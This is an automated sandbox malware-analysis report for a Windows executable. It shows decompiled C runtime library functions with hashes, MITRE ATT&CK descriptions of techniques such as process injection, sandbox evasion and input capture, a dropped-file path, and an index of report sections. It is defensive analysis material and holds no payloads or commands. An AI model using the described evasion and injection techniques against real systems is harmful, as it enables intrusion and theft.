String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 4be076c938bceef63c2f506d0f7b89980f48a47c416f2f60de0c2e2cad521dc1
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 2311837240414EBBCF125E85DC41CEE3F22BB58354F19842AFE18641B2C73AC972AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040F45F Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040F45F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x417c58);
				E0040C128(__ebx, __edi, __esi);
				_t29 = E00409F6C(__ebx, __edx, _t31);
				_t13 =  *0x42d194; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E0040DB4D(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x42d278; // 0x42d1a0
					 *((intOrPtr*)(_t30 - 0x1c)) = E0040F421(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E0040F4C9();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00409F6C(_t22, __edx, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E0040CCA3(_t25, 0x20);
				}
				return E0040C16D(_t29);
			}

APIs

__getptd.LIBCMT ref: 0040F46B

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__getptd.LIBCMT ref: 0040F482
__amsg_exit.LIBCMT ref: 0040F490
__lock.LIBCMT ref: 0040F4A0

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: c1e460487b385be20c3997de28e1949703a13e7a47ebf47c8db6bc9826152023
Instruction ID: ad62b0fe31f90ab5027265babbd9e778aec5ed69125f5d0d4d1c1e1c356c8084
Opcode Fuzzy Hash: c1e460487b385be20c3997de28e1949703a13e7a47ebf47c8db6bc9826152023
Instruction Fuzzy Hash: 95F09631B04700DBE730FB75840275F72A05B50714F51427FA984B7AD2CB3C9905CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFE2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFE2() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x430280;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x430280 = _t5;
				}
				_t6 = E00410529(_t5, 4);
				 *0x42f260 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x42c7b0;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x42ca30) {
							break;
						}
						_t6 =  *0x42f260;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x42c7c0;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x42f160 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x42c820);
					return 0;
				} else {
					 *0x430280 = _t26;
					_t6 = E00410529(_t26, 4);
					 *0x42f260 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

APIs

__calloc_crt.LIBCMT ref: 0040B004
__calloc_crt.LIBCMT ref: 0040B01D

Strings

(!@, xrefs: 0040B049

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: __calloc_crt
String ID: (!@
API String ID: 3494438863-861706809
Opcode ID: 3b89cfb7374a4b6736355ee4ea9648d338a4dcc5e1c608bee5186004743057a2
Instruction ID: c81a334fc5c2411f4df701e27ede37d27c0d3a282a9f30c1c91d009ecc8411c5
Opcode Fuzzy Hash: 3b89cfb7374a4b6736355ee4ea9648d338a4dcc5e1c608bee5186004743057a2
Instruction Fuzzy Hash: 5211C6723043159BE7388A1DBC946672395EB85B68B64427BF521EB3D0E73CCC8256CD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040A6C8(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E004070B6(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00409F6C(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00409F6C(__ebx, __edx, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
							_t17 = E0040708F( *((intOrPtr*)(_t28 + 0x18)));
							_t38 = _t17;
							if(_t17 != 0) {
								_push( *((intOrPtr*)(_t29 + 0x10)));
								_push(_t28);
								return E0040A460(_t38);
							}
						}
					}
				}
				return _t17;
			}

APIs

Part of subcall function 004070B6: __getptd.LIBCMT ref: 004070BC
Part of subcall function 004070B6: __getptd.LIBCMT ref: 004070CC

__getptd.LIBCMT ref: 0040A6D7

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__getptd.LIBCMT ref: 0040A6E5

Strings

csm, xrefs: 0040A6F3

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 5b147aff4b10d651f4ceec80f303942da5f950dc06aa6b0fc585759805665184
Instruction ID: 2975dbf0f67d70b07405766a2e2fa21c276c90f76bf20612886aa0b38ed4f4f2
Opcode Fuzzy Hash: 5b147aff4b10d651f4ceec80f303942da5f950dc06aa6b0fc585759805665184
Instruction Fuzzy Hash: D70128368013058ACF349F25C454AAEB3B5AF14315F55893FE482BB7D2CB38D9A1CE1A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ikNC1JE7rY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\sifdvgf

C:\Users\user\AppData\Roaming\sifdvgf:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
ikNC1JE7rY.exe

Function 00405A6B Relevance: 81.0, APIs: 32, Strings: 14, Instructions: 514
memorycomfileCOMMON

Function 00520110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Function 00520420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Function 005205B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Function 0040D805 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 00409D17 Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Function 004077DB Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Function 0040FBC1 Relevance: 1.7, APIs: 1, Instructions: 239
COMMONCrypto

Function 0040CC65 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 0040573C Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 93
memoryfilelibraryCOMMON

Function 00409E0C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Function 00406429 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 79
COMMON

Function 0040A5A2 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Function 00406B56 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
COMMON

Function 0040A2F1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Function 0040ECF3 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Function 004079A1 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Function 0040A94F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Function 004095AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Function 0040C56B Relevance: 6.1, APIs: 4, Instructions: 137
COMMONLIBRARYCODE

Function 004169D6 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Function 0040947A Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Function 0040F45F Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Function 0040AFE2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Function 0040A6C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON